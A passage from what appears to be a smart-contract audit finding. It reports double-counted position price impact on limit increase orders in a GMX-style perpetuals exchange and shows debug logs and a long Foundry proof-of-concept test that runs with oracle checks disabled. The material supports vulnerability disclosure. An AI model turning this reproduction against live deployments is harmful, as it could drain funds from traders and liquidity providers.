positiveImpactUsd: 0 negativeImpactUsd: 63107747838744499100000 deltaDiffUsd: 63107747838744499100000 priceImpactUsd: -63107747838744499100000 PositionPricingUtils.getPriceImpactUsd() completed. Initial priceImpactUsd: -63107747838744499100000 Capped priceImpactUsd: -63107747838744499100000\\nThen, during validation, when `PositionUtils.validatePosition()` is called, the double accouting occurs, notice the `nextDiffUsd` is doubled, as if the limitOrder was executed for another time!\\nPositionPricingUtils.getPriceImpactUsd started... openInterestParams.longOpenInterest: 1123456700000000000000000000000 openInterestParams.shortOpenInterest: 0 initialDiffUsd: 1123456700000000000000000000000 nextDiffUsd: 2246913400000000000000000000000 impactFactor: 100000000000000000000000 impactExponentFactor: 2000000000000000000000000000000 deltaDiffUsd: 189323243516233497450000 priceImpactUsd: -189323243516233497450000 priceImpactUsd: -189323243516233497450000 adjusted 2: priceImpactUsd: 0\\nThe POC code is as follows, pay attention to the `testLimit()` and the execution of `createLimitIncreaseOrder()`. Please comment out the checks for signature, timestamp and block number for oracle price in the source code to run the testing smoothly without revert.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../contracts/role/RoleStore.sol\";\\nimport \"../contracts/router/ExchangeRouter.sol\";\\nimport \"../contracts/data/DataStore.sol\";\\nimport \"../contracts/referral/ReferralStorage.sol\";\\n\\nimport \"../contracts/token/IWNT.sol\";\\nimport \"../contracts/token/WNT.sol\";\\nimport \"../contracts/token/SOLToken.sol\";\\nimport \"../contracts/token/USDC.sol\";\\nimport \"../contracts/token/tokenA.sol\";\\nimport \"../contracts/token/tokenB.sol\";\\nimport \"../contracts/token/tokenC.sol\";\\n\\nimport \"../contracts/market/MarketFactory.sol\";\\nimport \"../contracts/deposit/DepositUtils.sol\";\\nimport \"../contracts/oracle/OracleUtils.sol\";\\nimport \"@openzeppelin/contracts/utils/introspection/ERC165Checker.sol\";\\nimport \"../contracts/withdrawal/WithdrawalUtils.sol\";\\nimport \"../contracts/order/Order.sol\";\\nimport \"../contracts/order/BaseOrderUtils.sol\";\\nimport \"../contracts/price/Price.sol\";\\nimport \"../contracts/utils/Debug.sol\";\\nimport \"../contracts/position/Position.sol\";\\nimport \"../contracts/exchange/LiquidationHandler.sol\";\\nimport \"../contracts/utils/Calc.sol\";\\nimport \"@openzeppelin/contracts/utils/math/SignedMath.sol\";\\nimport \"@openzeppelin/contracts/utils/math/SafeCast.sol\";\\n\\n\\ncontract CounterTest is Test, Debug{\\n using SignedMath for int256;\\n using SafeCast for uint256;\\n\\n\\n WNT _wnt; \\n USDC _usdc;\\n SOLToken _sol;\\n tokenA _tokenA;\\n tokenB _tokenB;\\n tokenC _tokenC;\\n\\n RoleStore _roleStore;\\n Router _router;\\n DataStore _dataStore;\\n EventEmitter _eventEmitter;\\n DepositVault _depositVault;\\n OracleStore _oracleStore; \\n Oracle _oracle;\\n DepositHandler _depositHandler;\\n WithdrawalVault _withdrawalVault;\\n WithdrawalHandler _withdrawalHandler;\\n OrderHandler _orderHandler;\\n SwapHandler _swapHandler;\\n LiquidationHandler _liquidationHandler;\\n ReferralStorage _referralStorage;\\n OrderVault _orderVault;\\n ExchangeRouter _erouter;\\n MarketFactory _marketFactory;\\n Market.Props _marketProps1;\\n Market.Props _marketPropsAB;\\n Market.Props _marketPropsBC;\\n Market.Props _marketPropsCwnt;\\n \\n \\n address depositor1;\\n address depositor2;\\n address depositor3;\\n address uiFeeReceiver = address(333);\\n\\n\\n function testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(\"result: %d\", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(\"correctResult: %d\", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n\\n \\n\\n function setUp() public {\\n _wnt = new WNT();\\n _usdc = new USDC();\\n _sol = new SOLToken();\\n _tokenA = new tokenA();\\n _tokenB = new tokenB();\\n _tokenC = new tokenC();\\n \\n\\n\\n _roleStore = new RoleStore();\\n _router = new Router(_roleStore);\\n _dataStore = new DataStore(_roleStore);\\n \\n _eventEmitter= new EventEmitter(_roleStore);\\n _depositVault = new DepositVault(_roleStore, _dataStore);\\n _oracleStore = new OracleStore(_roleStore, _eventEmitter);\\n _oracle = new Oracle(_roleStore, _oracleStore);\\n console2.logString(\"_oracle:\"); console2.logAddress(address(_oracle));\\n \\n _depositHandler = new DepositHandler(_roleStore, _dataStore, _eventEmitter, _depositVault, _oracle);\\n console2.logString(\"_depositHandler:\"); console2.logAddress(address(_depositHandler));\\n \\n\\n _withdrawalVault = new WithdrawalVault(_roleStore, _dataStore);\\n _withdrawalHandler = new WithdrawalHandler(_roleStore, _dataStore, _eventEmitter, _withdrawalVault, _oracle);\\n \\n \\n _swapHandler = new SwapHandler(_roleStore);\\n _orderVault = new OrderVault(_roleStore, _dataStore);\\n _referralStorage = new ReferralStorage();\\n\\n\\n \\n _orderHandler = new OrderHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage); \\n _erouter = new ExchangeRouter(_router, _roleStore, _dataStore, _eventEmitter, _depositHandler, _withdrawalHandler, _orderHandler);\\n console2.logString(\"_erouter:\"); console2.logAddress(address(_erouter));\\n _liquidationHandler = new LiquidationHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage);\\n \\n _referralStorage.setHandler(address(_orderHandler), true); \\n\\n /* set myself as the controller so that I can set the address of WNT (wrapped native token contracdt) */\\n _roleStore.grantRole(address(this), Role.CONTROLLER);\\n _roleStore.grantRole(address(this), Role.MARKET_KEEPER);\\n \\n _dataStore.setUint(Keys.MAX_SWAP_PATH_LENGTH, 5); // at most 5 markets in the path\\n \\n _dataStore.setAddress(Keys.WNT, address(_wnt));\\n\\n /* set the token transfer gas limit for wnt as 3200 */\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n \\n\\n /* create a market (SQL, WNT, ETH, USDC) */\\n _marketFactory = new MarketFactory(_roleStore, _dataStore, _eventEmitter);\\n console2.logString(\"_marketFactory:\"); console2.logAddress(address(_marketFactory));\\n _roleStore.grantRole(address(_marketFactory), Role.CONTROLLER); // to save a market's props\\n _roleStore.grantRole(address(_erouter), Role.CONTROLLER); \\n _roleStore.grantRole(address(_depositHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_withdrawalHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_swapHandler), Role.CONTROLLER);\\n _roleStore.grantRole(address(_orderHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_liquidationHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_oracleStore), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(_oracle), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(this), Role.ORDER_KEEPER);\\n _roleStore.grantRole(address(this), Role.LIQUIDATION_KEEPER);\\n\\n \\n _marketProps1 = _marketFactory.createMarket(address(_sol), address(_wnt), address(_usdc), keccak256(abi.encode(\"sol-wnt-usdc\"))); \\n _marketPropsAB = _marketFactory.createMarket(address(0), address(_tokenA), address(_tokenB), keccak256(abi.encode(\"swap-tokenA-tokenB\"))); \\n _marketPropsBC = _marketFactory.createMarket(address(0), address(_tokenB), address(_tokenC), keccak256(abi.encode(\"swap-tokenB-tokenC\"))); \\n _marketPropsCwnt = _marketFactory.createMarket(address(0), address(_tokenC), address(_wnt), keccak256(abi.encode(\"swap-tokenC-wnt\"))); \\n \\n \\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, true), 1e25);\\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, false), 1e25);\\n \\n // see fees for the market\\n _dataStore.setUint(Keys.swapFeeFactorKey(_marketProps1.marketToken), 0.05e30); // 5%\\n _dataStore.setUint(Keys.SWAP_FEE_RECEIVER_FACTOR, 0.5e30);\\n _dataStore.setUint(Keys.positionFeeFactorKey(_marketProps1.marketToken), 0.00001234e30); // 2%\\n _dataStore.setUint(Keys.POSITION_FEE_RECEIVER_FACTOR, 0.15e30);\\n _dataStore.setUint(Keys.MAX_UI_FEE_FACTOR, 0.01e30);\\n _dataStore.setUint(Keys.uiFeeFactorKey(uiFeeReceiver), 0.01e30); // only when this is set, one can receive ui fee, so stealing is not easy\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.longToken), 1);\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.shortToken), 1);\\n _dataStore.setUint(Keys.swapImpactExponentFactorKey(_marketProps1.marketToken), 10e28);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, true), 0.99e30);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, false), 0.99e30);\\n\\n \\n \\n \\n // set gas limit to transfer a token\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_sol)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenA)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenB)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenC)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketProps1.marketToken)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsAB.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsBC.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsCwnt.marketToken)), 32000);\\n\\n\\n /* Configure the system parameters/limits here */\\n _dataStore.setUint(Keys.MAX_CALLBACK_GAS_LIMIT, 10000);\\n _dataStore.setUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT, 100);\\n _dataStore.setUint(Keys.MAX_ORACLE_PRICE_AGE, 2 hours);\\n _dataStore.setUint(Keys.MIN_ORACLE_BLOCK_CONFIRMATIONS, 3);\\n _dataStore.setUint(Keys.MIN_COLLATERAL_USD, 1e30); // just require $1 as min collateral usd\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, true), 5e29); // 50%\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, false), 5e29);\\n _dataStore.setUint(Keys.fundingExponentFactorKey(_marketProps1.marketToken), 1.1e30); // 2 in 30 decimals like a square, cube, etc\\n _dataStore.setUint(Keys.fundingFactorKey(_marketProps1.marketToken), 0.0000001e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, true), 0.87e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, false), 0.96e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, true), 2.1e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, false), 2.3e30);\\n _dataStore.setUint(Keys.positionImpactExponentFactorKey(_marketProps1.marketToken), 2e30);\\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, true), 5e22); \\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, false), 1e23);\\n\\n // set the limit of market tokens\\n\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.shortToken), 1000e18);\\n \\n \\n // set max open interest for each market\\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, true), 1e39); // 1B $ \\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, false), 1e39); // 1B $\\n\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, true), 10**29); // maxPnlFactor = 10% for long\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, false), 10**29); // maxPnlFactor = 10% for short\\n // _dataStore.setBool(Keys.cancelDepositFeatureDisabledKey(address(_depositHandler)), true);\\n _dataStore.setBool(Keys.cancelOrderFeatureDisabledKey(address(_orderHandler), uint256(Order.OrderType.MarketIncrease)), true);\\n\\n addFourSigners();\\n address(_wnt).call{value: 10000e18}(\"\");\\n depositor1 = address(0x801);\\n depositor2 = address(0x802);\\n depositor3 = address(0x803);\\n\\n // make sure each depositor has some tokens.\\n _wnt.transfer(depositor1, 1000e18);\\n _wnt.transfer(depositor2, 1000e18);\\n _wnt.transfer(depositor3, 1000e18); \\n _usdc.transfer(depositor1, 1000e18);\\n _usdc.transfer(depositor2, 1000e18);\\n _usdc.transfer(depositor3, 1000e18);\\n _tokenA.transfer(depositor1, 1000e18);\\n _tokenB.transfer(depositor1, 1000e18);\\n _tokenC.transfer(depositor1, 1000e18); \\n\\n printAllTokens(); \\n }\\n\\n error Unauthorized(string);\\n // error Error(string);\\n\\n\\nfunction testLimit() public{\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n // console2.log(\"PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP\");\\n \\n key = createMarketSwapOrder(depositor1, address(_wnt), 1e15); // create a deposit at block 3 which is within range (2, 6) \\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 2 is completed.\"); \\n \\n\\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1001e30, 106000000000000, true); // \\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 13e30, 101000000000000, false); // 110 usdc as collateral\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n\\n\\n console2.log(\"PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP\");\\n vm.warp(2 days);\\n setIndexTokenPrice(priceParams, 98, 100); // send 20e18 USDC, increase $13.123 in a long position with trigger price 101\\n key = createLimitIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 23e18, 1.1234567e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"Experiment 5 is completed.\\n\"); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n /*\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 7 for is completed.\"); \\n */\\n}\\n\\nfunction testMarketDecrease() public{\\n \\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n \\n \\n \\n console2.log(\"\\n\\n depositor 2 deposit into marketProps1\");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(\"Experiment 2 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1e25, 106000000000000, true); // \\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 1e25, 101000000000000, false); // 110 usdc as collateral\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n console2.log(\"********************************************\");\\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 70000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(\"a market desced order created with key: \");\\n console2.logBytes32(key);\\n console2.log(\"\\nExecuting the order// rest of code\"); \\n setIndexTokenPrice(priceParams, 60, 65); // we have a profit for a short position\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 5 is completed.\"); \\n\\n printAllTokens();\\n} \\n\\n \\n\\nfunction testLiquidation() public{\\n // blockrange (2, 6)\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n \\n \\n \\n console2.log(\"\\n\\n depositor 2 deposit into marketProps1\");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(\"Experiment 2 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 10e18, 1e25, 106000000000000, true);\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 100e18, 1e25, 101000000000000, false);\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n \\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 106000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(\"a market desced order created with key: \");\\n console2.logBytes32(key);\\n console2.log(\"\\nExecuting the order// rest of code\"); \\n setIndexTokenPrice(priceParams, 84, 90);\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(\"Experiment 5 is completed.\"); \\n \\n \\n\\n \\n // depositor3 will execute a LimitIncrease Order now\\n key = createMarketIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 20e18, 200e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"Experiment 6 is completed.\\n\"); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 7 for is completed.\"); \\n \\n // depositor3 creates a stopLossDecrease order\\n setIndexTokenPrice(priceParams, 97, 99);\\n key = createStopLossDecrease(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 95000000000000, 92000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(\"a StopLossDecrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n // Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n console2.log(\"Experiment 8 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n*************************************************\\n\\n\");\\n\\n\\n // depositor3 creates a Liquidation order\\n setIndexTokenPrice(priceParams, 75, 75);\\n console2.log(\"Liquidate a position// rest of code\");\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n _liquidationHandler.executeLiquidation(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true, priceParams);\\n console2.log(\"Experiment 9 is completed.\"); \\n \\n\\n // printPoolsAmounts();\\n printAllTokens();\\n\\n \\n \\n \\n}\\n\\nfunction printAllTokens() startedCompleted(\"printAllTokens\") public\\n{\\n console2.log(\"\\nTokens used in this test:\");\\n console2.log(\"_wnt: \"); console2.logAddress(address(_wnt));\\n console2.log(\"_usdc: \"); console2.logAddress(address(_usdc));\\n console2.log(\"_sol: \"); console2.logAddress(address(_sol));\\n console2.log(\"_tokenA: \"); console2.logAddress(address(_tokenA));\\n console2.log(\"_tokenB: \"); console2.logAddress(address(_tokenB));\\n console2.log(\"_tokenC: \"); console2.logAddress(address(_tokenC));\\n console2.logString(\"test contract address:\"); console2.logAddress(address(this));\\n \\n console2.log(\"_marketProps1 market token: \"); console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(\"_marketPropsAB market token: \"); console2.logAddress(address(_marketPropsAB.marketToken));\\n console2.log(\"_marketPropsBC market token: \"); console2.logAddress(address(_marketPropsBC.marketToken));\\n console2.log(\"_marketProps1Cwnt market token: \"); console2.logAddress(address(_marketPropsCwnt.marketToken));\\n console2.log(\"\\n\");\\n \\n \\n}\\n\\n\\nfunction printMarketTokenAmount() public \\n{ console2.log(\"Market token address: \");\\n console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(\"depositor1 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor1));\\n console2.log(\"depositor2 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor2));\\n console2.log(\"depositor3 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor3));\\n}\\n\\nfunction printLongShortTokens(address account) public\\n{\\n console2.log(\"balance for \"); console2.logAddress(account);\\n console2.log(\"_wnt balance:\", _wnt.balanceOf(account));\\n console2.log(\"usdc balance:\", _usdc.balanceOf(account));\\n}\\n\\n\\n\\n\\nfunction addFourSigners() private {\\n _oracleStore.addSigner(address(901));\\n _oracleStore.addSigner(address(902)); \\n _oracleStore.addSigner(address(903)); \\n _oracleStore.addSigner(address(904)); \\n}\\n\\n\\nfunction setIndexTokenPrice(OracleUtils.SetPricesParams memory priceParams, uint256 minP, uint256 maxP) public\\n{\\n uint256 mask1 = ~uint256(type(uint96).max); // (32*3 of 1's)\\n console2.logBytes32(bytes32(mask1));\\n\\n uint256 minPrice = minP;\\n minPrice = minPrice << 32 | minP;\\n minPrice = minPrice << 32 | minP;\\n\\n uint256 maxPrice = maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n\\n priceParams.compactedMinPrices[0] = (priceParams.compactedMinPrices[0] & mask1) | minPrice;\\n priceParams.compactedMaxPrices[0] = (priceParams.compactedMaxPrices[0] & mask1) | maxPrice;\\n}\\n\\n\\nfunction createSetPricesParams() public returns (OracleUtils.SetPricesParams memory) {\\n uint256 signerInfo = 3; // signer 904\\n signerInfo = signerInfo << 16 | 2; // signer 903\\n signerInfo = signerInfo << 16 | 1; // signer 902\\n signerInfo = signerInfo << 16 | 3; // number of singers\\n // will read out as 902, 903, 904 from the lowest first\\n\\n // the number of tokens, 6\\n address[] memory tokens = new address[](6);\\n tokens[0] = address(_sol);\\n tokens[1] = address(_wnt);\\n tokens[2] = address(_usdc);\\n tokens[3] = address(_tokenA);\\n tokens[4] = address(_tokenB);\\n tokens[5] = address(_tokenC);\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedMinOracleBlockNumbers = new uint256[](2);\\n compactedMinOracleBlockNumbers[0] = block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n\\n compactedMinOracleBlockNumbers[1] = block.number+1;\\n compactedMinOracleBlockNumbers[1] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n \\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n \\n uint256[] memory compactedMaxOracleBlockNumbers = new uint256[](2);\\n compactedMaxOracleBlockNumbers[0] = block.number+5; \\n compactedMaxOracleBlockNumbers[0] = 